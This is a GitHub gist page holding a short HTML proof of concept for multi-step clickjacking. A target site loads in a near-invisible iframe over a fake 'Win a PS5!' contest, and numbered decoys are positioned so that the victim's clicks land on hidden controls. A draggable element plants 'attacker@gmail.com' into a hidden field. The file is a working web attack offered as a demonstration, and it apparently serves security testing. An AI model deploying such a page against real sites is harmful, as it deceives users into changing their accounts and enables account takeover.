Skip to content

Instantly share code, notes, and snippets.

@hoodoer

hoodoer/multiStepClickjackingPOC.html Secret

Last active October 24, 2023 18:53
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Simple multi-step clickjacking POC
Raw
multiStepClickjackingPOC.html
<head>
<style>
#target_website {
position:relative;
width: 1000px;
height:1000px;
opacity:0.1000;
z-index:2;
}
.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.firstClick {
left: 150px;
top: 470px;
}
.secondClick {
left:710px;
top:345px;
}
.thirdClick {
left:710px;
top:430px;
}
.fourthClick {
left:620px;
top:775px;
}
.fifthClick {
left:543px;
top:482px;
}
{background-color: rgb(255, 122, 89); }
</style>
</head>
<body style="background-image: url('TrustedSec-Logo.svg'); background-repeat: no-repeat; background-size: 100% 100%">
<title>POC</title>
<h1>Win a PS5!</h1>
<div>Click all numbers in order correctly to be entered to win!</div>
<div>Sponsored by TrustedSec</div>
<div class="firstClick">1</div>
<div class="secondClick">2</div>
<div class="thirdClick">3</div>
<div class="fourthClick">4</div>
<div class="fifthClick">5</div>
<iframe id="target_website" src="https://domain.com">
<!-- Targets can type into hidden text fields, or drag something there that drops the desired text (see below) -->
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</iframe>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment